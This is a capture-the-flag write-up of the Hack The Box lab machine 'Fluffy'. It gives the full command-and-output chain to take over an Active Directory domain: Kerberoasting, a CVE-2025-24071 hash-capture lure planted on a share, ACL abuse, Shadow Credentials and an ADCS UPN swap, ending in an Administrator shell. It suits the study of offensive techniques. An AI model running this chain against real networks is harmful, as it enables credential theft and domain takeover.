Hack The Box / WINDOWS / 2026-03-18
Hack The Box — Fluffy (Windows)
Initial domain foothold from provided credentials, credential capture via CVE-2025-24071 lure, Shadow Credentials on service accounts, and final ADCS abuse to authenticate as Administrator.
Target
- IP:
10.129.205.253
Machine information
As is common in real-life Windows pentests, you start the Fluffy box with credentials for the following account:
j.fleischman / J0elTHEM4n1990!
Recon
sudo nmap -sC -sV 10.129.205.253 -p- -T5 -v
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-25 20:32:29Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:33:59+00:00; +22h26m28s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:34:00+00:00; +22h26m28s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:33:59+00:00; +22h26m28s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Issuer: commonName=fluffy-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-17T16:04:17
| Not valid after: 2026-04-17T16:04:17
| MD5: 2765:a68f:4883:dc6d:0969:5d0d:3666:c880
|_SHA-1: 72f3:1d5f:e6f3:b8ab:6b0e:dd77:5414:0d0c:abfe:e681
|_ssl-date: 2025-05-25T20:34:00+00:00; +22h26m28s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Add fluffy.htb and dc01.fluffy.htb to /etc/hosts.
nxc smb 10.129.205.253 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
SMB 10.129.205.253 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.205.253 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.205.253 445 DC01 [*] Enumerated shares
SMB 10.129.205.253 445 DC01 Share Permissions Remark
SMB 10.129.205.253 445 DC01 ----- ----------- ------
SMB 10.129.205.253 445 DC01 ADMIN$ Remote Admin
SMB 10.129.205.253 445 DC01 C$ Default share
SMB 10.129.205.253 445 DC01 IPC$ READ Remote IPC
SMB 10.129.205.253 445 DC01 IT READ,WRITE
SMB 10.129.205.253 445 DC01 NETLOGON READ Logon server share
SMB 10.129.205.253 445 DC01 SYSVOL READ Logon server share
We notice the IT share, readable and writable.
smbclient -U j.fleischman '\\10.129.205.253\IT'
ls
. D 0 Sun May 25 22:30:11 2025
.. D 0 Sun May 25 22:30:11 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 17:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 17:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 17:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 17:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 16:31:07 2025
get Upgrade_Notice.pdf
In the PDF it says vulnerabilities were discovered and systems need updates.
At the end it says:
Please reach out to the Infrastructure Department at infrastructure@fluffy.htb
Optionally we can mount the share on attacker machine:
mkdir mount
sudo mount -t cifs //10.129.205.253/IT ./mount -o username='j.fleischman',password='J0elTHEM4n1990!'
bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.205.253 -d 'fluffy.htb' -dc 'dc01.fluffy.htb' -c All --zip
nxc smb dc01.fluffy.htb -d fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --rid-brute 5000 | grep SidTypeUser | cut -d: -f2 | cut -d \\ -f2 | cut -d' ' -f1 > users.txt
In BloodHound, click Cypher --> click the folder --> Active Directory --> All Kerberoastable users.
There are ldap_svc, ca_svc, and winrm_svc.
Download targetedKerberoast:
- https://github.com/ShutdownRepo/targetedKerberoast
sudo ntpdate dc01.fluffy.htb
python3 targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'j.fleischman' -p 'J0elTHEM4n1990!'
We obtain hashes for the three users.
Put them in hash.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
They do not crack.
In Upgrade_Notice.pdf these CVEs are listed:
CVE-2025-24996
CVE-2025-24071
CVE-2025-46785
CVE-2025-29968
CVE-2025-21193
CVE-2025-3445
For CVE-2025-24071 there is an exploit:
- https://github.com/0x6rss/CVE-2025-24071_PoC
git clone https://github.com/0x6rss/CVE-2025-24071_PoC.git
python3 poc.py
Enter your file name: documents
Enter IP (EX: 192.168.1.162): 10.10.14.252
completed
We get file exploit.zip.
sudo responder -I tun0
Copy exploit.zip into the IT share.
Wait.
In Responder we get hash of p.agila.
Put it in hash.
./hashcat-6.2.6/hashcat.bin -a 0 ./hash ./rockyou.txt
We get password prometheusx-303.
In BloodHound we see p.agila is a member of group service account managers, which has GenericAll toward group service accounts.
Users ca_svc, ldap_svc, and winrm_svc are in service accounts.
We also see service accounts has GenericWrite toward those three users.
Download bloodyAD:
- https://github.com/CravateRouge/bloodyAD
python3 bloodyAD/bloodyAD.py --host 'dc01.fluffy.htb' -d fluffy.htb --dc-ip dc01.puppy.htb -u 'p.agila' -p 'prometheusx-303' set owner 'service accounts' 'p.agila'
[+] Old owner S-1-5-21-497550768-2797716248-2627064577-512 is now replaced by p.agila on service accounts
python3 bloodyAD/bloodyAD.py --host 'dc01.fluffy.htb' -d fluffy.htb --dc-ip dc01.puppy.htb -u 'p.agila' -p 'prometheusx-303' add groupMember 'service accounts' 'p.agila'
[+] p.agila added to service accounts
python3 bloodyAD/bloodyAD.py --host 'dc01.fluffy.htb' -d fluffy.htb --dc-ip dc01.fluffy.htb -u 'p.agila' -p 'prometheusx-303' add genericAll 'service accounts' 'p.agila'
[+] p.agila has now GenericAll on service accounts
git clone https://github.com/ShutdownRepo/pywhisker.git
cd pywhisker
git checkout c4ecf411a585ca4647843c8c3856e023e738a528
cd ..
python3 pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "winrm_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6b01eb5f-13c2-8d6e-5438-4e7cc8a2c9fd
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: pyoRq0ue.pfx
[*] Must be used with password: 2wfPMOr5T2bWNVeLsBk3
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
A file pyoRq0ue.pfx is created.
certipy cert -export -pfx pyoRq0ue.pfx -password 2wfPMOr5T2bWNVeLsBk3 -out "pyoRq0ue_unprotected.pfx"
[*] Writing PFX to 'pyoRq0ue_unprotected.pfx'
certipy auth -pfx pyoRq0ue_unprotected.pfx -dc-ip 10.129.205.253 -username winrm_svc -domain 'fluffy.htb'
[*] Got hash for 'winrm_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767
evil-winrm -i dc01.fluffy.htb -u 'winrm_svc' -H '33bd09dcd697600edf6b3a7af4875767'
We get a PowerShell shell as winrm_svc.
We can retrieve the user flag.
Now repeat the same procedure for ca_svc.
Repeat the previous bloodyAD commands.
python3 pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p "prometheusx-303" --target "ca_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 7c220f45-51c4-87bc-a578-b272d1708860
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: siYhTVMS.pfx
[*] Must be used with password: GzsbKHyia5Ty6M1ObQDj
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
A file siYhTVMS.pfx is created.
certipy cert -export -pfx siYhTVMS.pfx -password GzsbKHyia5Ty6M1ObQDj -out "siYhTVMS_unprotected.pfx"
[*] Writing PFX to 'siYhTVMS_unprotected.pfx'
certipy auth -pfx siYhTVMS_unprotected.pfx -dc-ip 10.129.205.253 -username ca_svc -domain 'fluffy.htb'
[*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8
ca_svc is in group cert publishers.
Do the same steps for ldap_svc.
At the end we get:
[*] Got hash for 'ldap_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:22151d74ba3de931a352cba1f9393a37
certipy find -u 'ca_svc' -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -target dc01.fluffy.htb -text -stdout -vulnerable
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
Certificate Templates : [!] Could not find any certificate templates
There are no vulnerable templates.
certipy account update -username ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -user ca_svc -upn Administrator
[*] Updating user 'ca_svc':
userPrincipalName : Administrator
[*] Successfully updated 'ca_svc'
certipy req -username ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -ca 'fluffy-DC01-CA' -target dc01.fluffy.htb -template User -upn administrator@fluffy.htb
[*] Saved certificate and private key to 'administrator.pfx'
certipy account update -username ca_svc@fluffy.htb -hashes 'ca0f4f9e9eb8a092addf53bb03fc98c8' -user ca_svc -upn ca_svc
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc
[*] Successfully updated 'ca_svc'
certipy auth -pfx administrator.pfx -dc-ip 10.129.54.217 -username Administrator -domain 'fluffy.htb'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
evil-winrm -i dc01.fluffy.htb -u 'Administrator' -H '8da83a3fa618b6e3a00e93f676c92a6e'
We get a PowerShell shell as Administrator.